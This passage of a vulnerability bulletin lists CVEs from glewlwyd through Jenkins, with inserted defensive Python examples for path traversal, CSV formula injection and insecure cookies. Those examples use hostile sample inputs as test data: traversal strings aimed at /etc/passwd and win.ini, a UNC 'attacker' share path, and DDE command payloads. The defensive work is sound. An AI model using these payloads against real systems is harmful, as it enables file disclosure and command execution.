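Both the fasthttp entry (CVE-2022-21221, traversal through a backslash that only Windows treats as a separator) and the Gitea avatar entry (CVE-2021-29134) come down to mapping a URL path onto a file without checking the result. The following is an added example, not fasthttp or Gitea code: a resolver that decodes once, treats `\` as a separator on every platform, normalises, and then checks containment on the final path. The document root and the sample requests are constructed for the example.

```python
"""Added example (not fasthttp or Gitea code): map a URL path onto a file under
a document root so that neither '..' segments nor backslashes (%5c) can escape
it. The root and the sample paths below are constructed for the example."""
import posixpath
import re
import urllib.parse

_DRIVE_LETTER = re.compile(r"^[A-Za-z]:")


class PathTraversal(ValueError):
    pass


def resolve_under_root(root, url_path):
    """Return the normalised POSIX path for url_path inside root, or raise.

    Order matters: decode first, then treat '\\' as a separator (a Windows
    filesystem does, even when the HTTP layer does not), then normalise, then
    check containment on the result rather than on the raw request."""
    decoded = urllib.parse.unquote(url_path)
    if "\x00" in decoded:
        raise PathTraversal("NUL byte in path")
    unified = decoded.replace("\\", "/")
    if unified.startswith("//") or _DRIVE_LETTER.match(unified.lstrip("/")):
        raise PathTraversal("UNC or drive-letter path")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, unified.lstrip("/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        raise PathTraversal("escapes document root: " + candidate)
    return candidate


def is_contained(root, url_path):
    """Boolean form of resolve_under_root for callers that only need a verdict."""
    try:
        resolve_under_root(root, url_path)
        return True
    except PathTraversal:
        return False


# Constructed requests: the backslash variants are the fasthttp case, the rest
# are the encodings a traversal scanner usually tries.
SAMPLE_REQUESTS = {
    "/static/app.js": True,
    "/static/../index.html": True,
    "/../../etc/passwd": False,
    "/..%5c..%5cwindows%5cwin.ini": False,
    "/static/..%5c..%5c..%5cwindows%5cwin.ini": False,
    "/%2e%2e/%2e%2e/etc/passwd": False,
    "/logo%00.png/../../etc/passwd": False,
    "/C:%5cWindows%5cwin.ini": False,
    "//attacker/share/payload": False,
}

if __name__ == "__main__":
    for req, expected in SAMPLE_REQUESTS.items():
        print(f"{req!r:45} allowed={is_contained('/srv/www', req)} expected={expected}")
```

The resolver decodes exactly once. If a downstream component decodes again, a doubly encoded `%252e%252e%255c` passes this check as a literal file name and is turned into `..\` later, so the containment check has to run after the last decoding step in the pipeline, not before it.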
glewlwyd — sso_server scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion. 2022-03-18 not yet calculated CVE-2022-27240
MISC
MISC
go-ethereum — go-ethereum Go-Ethereum v1.10.9 was discovered to contain an issue which allows attackers to cause a denial of service (DoS) via sending an excessive amount of messages to a node. This is caused by missing memory in the component /ethash/algorithm.go. 2022-03-17 not yet calculated CVE-2021-42219
MISC
golang — go golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey. 2022-03-18 not yet calculated CVE-2022-27191
CONFIRM
MISC
google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-204585345. References: N/A 2022-03-16 not yet calculated CVE-2021-39722
MISC
google — android In usb_gadget_giveback_request of core.c, there is a possible use after free out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-161010552. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39792
MISC
google — android Product: Android. Versions: Android kernel. Android ID: A-209014813. References: N/A 2022-03-16 not yet calculated CVE-2021-39723
MISC
google — android Product: Android. Versions: Android kernel. Android ID: A-208229524. References: N/A 2022-03-16 not yet calculated CVE-2021-39737
MISC
google — android In TuningProviderBase::GetTuningTreeSet of tuning_provider_base.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205753190. References: N/A 2022-03-16 not yet calculated CVE-2021-39724
MISC
google — android In gasket_free_coherent_memory_all of gasket_page_table.c, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-151454974. References: N/A 2022-03-16 not yet calculated CVE-2021-39725
MISC
google — android In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-181782896. References: N/A 2022-03-16 not yet calculated CVE-2021-39726
MISC
google — android In copy_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205992503. References: N/A 2022-03-16 not yet calculated CVE-2021-39732
MISC
google — android In eicPresentationRetrieveEntryValue of acropora/app/identity/libeic/EicPresentation.c, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-196388042. References: N/A 2022-03-16 not yet calculated CVE-2021-39727
MISC
google — android In prepare_io_entry and prepare_response of lwis_ioctl.c and lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205995773. References: N/A 2022-03-16 not yet calculated CVE-2021-39736
MISC
google — android In amcs_cdev_unlocked_ioctl of audiometrics.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-206128522. References: N/A 2022-03-16 not yet calculated CVE-2021-39733
MISC
google — android In sendMessage of OneToOneChatImpl.java (? TBD), there is a possible way to send an RCS message without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-208650395. References: N/A 2022-03-16 not yet calculated CVE-2021-39734
MISC
google — android In the TitanM chip, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-202006191. References: N/A 2022-03-16 not yet calculated CVE-2021-39729
MISC
google — android In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-210470189. References: N/A 2022-03-16 not yet calculated CVE-2021-39793
MISC
google — android In TBD of TBD, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-206472503. References: N/A 2022-03-16 not yet calculated CVE-2021-39730
MISC
google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205036834. References: N/A 2022-03-16 not yet calculated CVE-2021-39731
MISC
google — android In gasket_alloc_coherent_memory of gasket_page_table.c, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-151455484. References: N/A 2022-03-16 not yet calculated CVE-2021-39735
MISC
google — android Product: Android. Versions: Android kernel. Android ID: A-206977562. References: N/A 2022-03-16 not yet calculated CVE-2021-39716
MISC
google — android In onCreate of RequestManageCredentials.java, there is a possible way for a third party app to install certificates without user approval due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-205150380 2022-03-16 not yet calculated CVE-2021-39702
MISC
google — android In multiple functions of odsign_main.cpp, there is a possible way to persist system attack due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-206090748 2022-03-16 not yet calculated CVE-2021-39689
MISC
google — android In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-210292376. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39685
MISC
google — android In setDisplayPadding of WallpaperManagerService.java, there is a possible way to cause a persistent DoS due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-204316511 2022-03-16 not yet calculated CVE-2021-39690
MISC
google — android In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-209611539 2022-03-16 not yet calculated CVE-2021-39692
MISC
google — android In onUidStateChanged of AppOpsService.java, there is a possible way to access location without a visible indicator due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-208662370 2022-03-16 not yet calculated CVE-2021-39693
MISC
google — android In ih264d_parse_decode_slice of ih264d_parse_slice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-205702093 2022-03-16 not yet calculated CVE-2021-39667
MISC
google — android In parse of RoleParser.java, there is a possible way for default apps to get permissions explicitly denied by the user due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-202312327 2022-03-16 not yet calculated CVE-2021-39694
MISC
google — android In createOrUpdate of BasePermission.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-209607944 2022-03-16 not yet calculated CVE-2021-39695
MISC
google — android In checkFileUriDestination of DownloadProvider.java, there is a possible way to bypass external storage private directories protection due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12. Android ID: A-200813547 2022-03-16 not yet calculated CVE-2021-39697
MISC
google — android In aio_poll_complete_work of aio.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-185125206. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39698
MISC
google — android In serviceConnection of ControlsProviderLifecycleManager.kt, there is a possible way to keep service running in foreground without notification or permission due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11, Android-12. Android ID: A-212286849 2022-03-16 not yet calculated CVE-2021-39701
MISC
google — android In TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-195726151. References: N/A 2022-03-16 not yet calculated CVE-2021-39721
MISC
google — android In updateState of UsbDeviceManager.java, there is a possible unauthorized access of files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-207057578 2022-03-16 not yet calculated CVE-2021-39703
MISC
google — android In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-209965481 2022-03-16 not yet calculated CVE-2021-39704
MISC
google — android In getNotificationTag of LegacyVoicemailNotifier.java, there is a possible leak of ICCID due to a permissions bypass. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-186026746 2022-03-16 not yet calculated CVE-2021-39705
MISC
google — android In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-200164168 2022-03-16 not yet calculated CVE-2021-39706
MISC
google — android In onReceive of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-200688991 2022-03-16 not yet calculated CVE-2021-39707
MISC
google — android In __show_regs of process.c, there is a possible leak of kernel memory and addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-178379135. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39715
MISC
google — android Product: Android. Versions: Android kernel. Android ID: A-207433926. References: N/A 2022-03-16 not yet calculated CVE-2021-39720
MISC
google — android In lwis_top_register_io of lwis_device_top.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205995178. References: N/A 2022-03-16 not yet calculated CVE-2021-39719
MISC
google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205035540. References: N/A 2022-03-16 not yet calculated CVE-2021-39718
MISC
google — android In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-206128341 2022-03-16 not yet calculated CVE-2021-39708
MISC
google — android In iaxxx_btp_write_words of iaxxx-btp.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-198653629. References: N/A 2022-03-16 not yet calculated CVE-2021-39717
MISC
google — android In ion_buffer_kmap_get of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-205573273. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39714
MISC
google — android Product: Android. Versions: Android kernel. Android ID: A-173788806. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39713
MISC
google — android In TBD of TBD, there is a possible use after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-176918884. References: N/A 2022-03-16 not yet calculated CVE-2021-39712
MISC
google — android In bpf_prog_test_run_skb of test_run.c, there is a possible out of bounds read due to an incorrect size value. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-154175781. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39711
MISC
google — android Product: Android. Versions: Android kernel. Android ID: A-202160245. References: N/A 2022-03-16 not yet calculated CVE-2021-39710
MISC
google — android In sendSipAccountsRemovedNotification of SipAccountRegistry.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12. Android ID: A-208817618 2022-03-16 not yet calculated CVE-2021-39709
MISC
google — android In several functions of binder.c, there is a possible way to represent the wrong domain to SELinux due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-200688826. References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39686
MISC
google — android In Package Manager, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-67862680 2022-03-16 not yet calculated CVE-2021-39624
MISC
google — android In NotificationStackScrollLayout of NotificationStackScrollLayout.java, there is a possible way to bypass Factory Reset Protections. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12. Android ID: A-193149550 2022-03-16 not yet calculated CVE-2021-0957
MISC
google — sa360-webquery-bigquery A local attacker could read files from some other users’ SA360 reports stored in the /tmp folder during the staging process, before the files are loaded into BigQuery. We recommend upgrading to version 1.0.3 or above. 2022-03-18 not yet calculated CVE-2021-22571
CONFIRM
CONFIRM
gpac — gpac GPAC 1.0.1 is affected by a heap-based buffer overflow in SFS_AddString () at bifs/script_dec.c. 2022-03-14 not yet calculated CVE-2022-24578
MISC
gpac — gpac GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen (). 2022-03-14 not yet calculated CVE-2022-24577
MISC
gradio — gradio `gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer’s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user’s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs. 2022-03-17 not yet calculated CVE-2022-24770
CONFIRM
MISC
MISC
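The gradio entry above describes CSV (formula) injection: a cell that begins with `=`, `+`, `-` or `@` is evaluated, not displayed, when a spreadsheet opens the file. The following is an added example, not gradio's code, of the single-quote neutralisation the 2.8.11 fix relies on, applied to a constructed set of flagged rows. The trigger-character list follows the usual OWASP guidance and is an assumption of the example, as is the DDE-style sample payload.

```python
"""Added example (not gradio's code): neutralising spreadsheet formula cells
before they are written to a CSV that a person may open in Excel or LibreOffice.
The single-quote prefix is the approach the gradio 2.8.11 fix took; the list of
trigger characters follows the OWASP CSV injection guidance."""
import csv
import io

# Leading characters a spreadsheet treats as the start of a formula. Tab and CR
# are included because a cell that starts with them is also re-evaluated.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula(cell):
    return isinstance(cell, str) and cell.startswith(FORMULA_TRIGGERS)


def neutralize(cell):
    """Prefix a formula-looking string with a single quote so the spreadsheet
    stores it as text. The quote stays in the file, so anything that later
    parses the CSV programmatically must strip it again."""
    return "'" + cell if is_formula(cell) else cell


def rows_to_csv(rows):
    """Write rows (lists of cells) with every string cell neutralised. The csv
    module's quoting handles commas, quotes and newlines; that quoting alone
    does not stop formula execution, hence the extra step."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(c) for c in row])
    return buf.getvalue()


# Constructed sample: what a flagged input/output pair could look like after a
# user submitted a DDE-style payload as the text input.
SAMPLE_ROWS = [
    ["input", "output", "flag"],
    ["=cmd|' /C calc'!A0", "positive", "wrong"],
    ["-2+3+cmd|' /C calc'!A0", "negative", "ok"],
    ["plain text, with comma", "neutral", "ok"],
]

if __name__ == "__main__":
    print(rows_to_csv(SAMPLE_ROWS))
```

The `-` trigger means a legitimate negative number stored as a string (`"-3"`) is also prefixed; that is the price of neutralising on write rather than trusting whoever opens the file. If the CSV is only ever consumed by code, the cleaner option is to leave the data alone and serve it with a content type that no spreadsheet claims.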
gradle_enterprise — gradle_enterprise Gradle Enterprise before 2021.4.3 relies on cleartext data transmission in some situations. It uses Keycloak for identity management services. During the sign-in process, Keycloak sets browser cookies that effectively provide remember-me functionality. For backwards compatibility with older Safari versions, Keycloak sets a duplicate of the cookie without the Secure attribute, which allows the cookie to be sent when accessing the location that cookie is set for via HTTP. This creates the potential for an attacker (with the ability to impersonate the Gradle Enterprise host) to capture the login session of a user by having them click an http:// link to the server, despite the real server requiring HTTPS. 2022-03-16 not yet calculated CVE-2022-27225
MISC
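The Gradle Enterprise entry above is a cookie-attribute problem rather than a code flaw: the same session token is issued twice, once with `Secure` and once without, so one `http://` link to the host leaks the weaker copy. The following is an added example, not Gradle Enterprise or Keycloak code, of a check that audits the `Set-Cookie` headers of a login response for exactly that pattern. The cookie names, values and headers are constructed for the example.

```python
"""Added example (not Gradle Enterprise or Keycloak code): audit the Set-Cookie
headers of a login response for the weakness described above, a session cookie
duplicated without the Secure attribute. Cookie names and values are constructed."""


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attrs). Attribute names are
    lower-cased; flag attributes such as Secure map to True."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value.strip(), attrs


def audit_set_cookies(headers, served_over_https=True):
    """Return a list of (cookie name, finding) tuples, empty when all is well."""
    findings = []
    parsed = [parse_set_cookie(h) for h in headers]
    for name, _, attrs in parsed:
        if served_over_https and not attrs.get("secure"):
            findings.append((name, "missing Secure"))
        if not attrs.get("httponly"):
            findings.append((name, "missing HttpOnly"))
    # The CVE-2022-27225 pattern: the same token issued under a second name as a
    # browser-compatibility fallback, but without Secure. The browser will send
    # that copy on any http:// request to the host, and with it the session.
    for name, value, attrs in parsed:
        if attrs.get("secure"):
            continue
        for other_name, other_value, other_attrs in parsed:
            if other_name != name and other_value == value and other_attrs.get("secure"):
                findings.append((name, "duplicate of '%s' without Secure" % other_name))
    return findings


# Constructed login response headers: a primary session cookie and its fallback.
SAMPLE_HEADERS = [
    "session=7f3a9c; Path=/; Secure; HttpOnly; SameSite=None",
    "session_legacy=7f3a9c; Path=/; HttpOnly",
    "theme=dark; Path=/; Secure; Max-Age=31536000",
]

if __name__ == "__main__":
    for name, finding in audit_set_cookies(SAMPLE_HEADERS):
        print(f"{name}: {finding}")
```

The check is deliberately run on the raw headers rather than on a browser's cookie jar, because a jar only shows what the browser kept and not the weaker duplicate it might send elsewhere. HSTS on the host narrows the window further but does not remove it for a first visit.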
gradle_enterprise — gradle_enterprise In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.) 2022-03-17 not yet calculated CVE-2022-25364
MISC
MISC
hestiacp — hestiacp Reflected Cross-site Scripting (XSS) Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.11. 2022-03-16 not yet calculated CVE-2022-0986
MISC
CONFIRM
hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in department.php. 2022-03-15 not yet calculated CVE-2022-25490
MISC
hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in appointment.php. 2022-03-15 not yet calculated CVE-2022-25491
MISC
hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the medicineid parameter in ajaxmedicine.php. 2022-03-15 not yet calculated CVE-2022-25492
MISC
hms — hms HMS v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via treatmentrecord.php. 2022-03-15 not yet calculated CVE-2022-25493
MISC
htmldoc — htmldoc A flaw was found in htmldoc before v1.9.12. A heap buffer overflow in pspdf_prepare_outpages() in ps-pdf.cxx may allow arbitrary code execution or denial of service. 2022-03-16 not yet calculated CVE-2021-23165
MISC
MISC
MISC
MISC
htmldoc — htmldoc A flaw was found in htmldoc in v1.9.12. A double free in pspdf_export() in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code or cause a denial of service. 2022-03-16 not yet calculated CVE-2021-23158
MISC
MISC
MISC
httpie — httpie Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository httpie/httpie prior to 3.1.0. 2022-03-15 not yet calculated CVE-2022-0430
MISC
CONFIRM
ibm — big_sql_and_cloud_pak_for_data IBM Big SQL on IBM Cloud Pak for Data 7.1.0, 7.1.1, 7.2.0, and 7.2.3 could allow an authenticated user with appropriate permissions to obtain sensitive information by bypassing data masking rules using a CREATE TABLE SELECT statement. IBM X-Force ID: 220480. 2022-03-14 not yet calculated CVE-2022-22353
CONFIRM
XF
ibm — business_automation_workflow IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 store user credentials in clear text, which can be read by a privileged user. IBM X-Force ID: 214346. 2022-03-18 not yet calculated CVE-2021-39046
XF
CONFIRM
ibm — data_virtualization IBM Data Virtualization on Cloud Pak for Data 1.3.0, 1.4.1, 1.5.0, 1.7.1 and 1.7.3 could allow an authorized user to bypass data masking rules and obtain sensitive information. IBM X-Force ID: 212620. 2022-03-14 not yet calculated CVE-2021-38971
XF
CONFIRM
ibm — engineering_requirements_quality_assistant IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413. 2022-03-18 not yet calculated CVE-2021-29899
CONFIRM
XF
ibm — engineering_workflow_management IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 and IBM Rational Team Concert 6.0.6 and 6.0.0.1 could allow an authenticated user to obtain sensitive information about build definitions. IBM X-Force ID: 192707. 2022-03-15 not yet calculated CVE-2020-4989
CONFIRM
XF
ibm — spectrum_copy_data_management
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534. 2022-03-14 not yet calculated CVE-2021-39055
CONFIRM
XF
ibm — spectrum_copy_data_management
 
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 220038 2022-03-14 not yet calculated CVE-2022-22344
CONFIRM
XF
ibm — spectrum_copy_data_management
 
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to server-side request forgery, caused by improper input of application server registration function. A remote attacker could exploit this vulnerability using the host address and port fields of the application server registration form in the portal UI to enumerate and attack services that are running on those hosts. IBM X-Force ID: 214441. 2022-03-14 not yet calculated CVE-2021-39051
CONFIRM
XF
ibm — spectrum_protect_operations_center
 
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 220048. 2022-03-14 not yet calculated CVE-2022-22346
CONFIRM
XF
ibm — spectrum_protect_operations_centers
 
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to reverse tabnabbing where it could allow a page linked to from within Operations Center to rewrite it. An administrator could enter a link to a malicious URL that another administrator could then click. Once clicked, that malicious URL could then rewrite the original page with a phishing page. IBM X-Force ID: 220139. 2022-03-14 not yet calculated CVE-2022-22348
CONFIRM
XF
ibm — spectrum_protect_plus
 
IBM Spectrum Protect Plus 10.1.0.0 through 10.1.9.2 and IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 do not limit the length of a connection which could allow for a Slowloris HTTP denial of service attack to take place. This can cause the Admin Console to become unresponsive. IBM X-Force ID: 220485. 2022-03-14 not yet calculated CVE-2022-22354
CONFIRM
CONFIRM
XF
in_pluck — in_pluck
 
In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution. 2022-03-18 not yet calculated CVE-2022-26965
MISC
MISC
irz — mobile_routers
 
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor’s defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router’s default credentials aren’t rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction. 2022-03-19 not yet calculated CVE-2022-27226
MISC
MISC
MISC
jenkins — cloudbees_aws_credentials
 
A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. 2022-03-15 not yet calculated CVE-2022-27199
CONFIRM
MLIST
jenkins — cloudbees_aws_credentials
 
A cross-site request forgery (CSRF) vulnerability in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. 2022-03-15 not yet calculated CVE-2022-27198
CONFIRM
MLIST
jenkins — dashboard_view
 
Jenkins Dashboard View Plugin 2.18 and earlier does not perform URL validation for the Iframe Portlet’s Iframe source URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure views. 2022-03-15 not yet calculated CVE-2022-27197
CONFIRM
MLIST
jenkins — dbcharts
 
Jenkins dbCharts Plugin 0.5.2 and earlier stores JDBC connection passwords unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27216
CONFIRM
MLIST
jenkins — environment_dashboard
 
Jenkins Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission. 2022-03-15 not yet calculated CVE-2022-27213
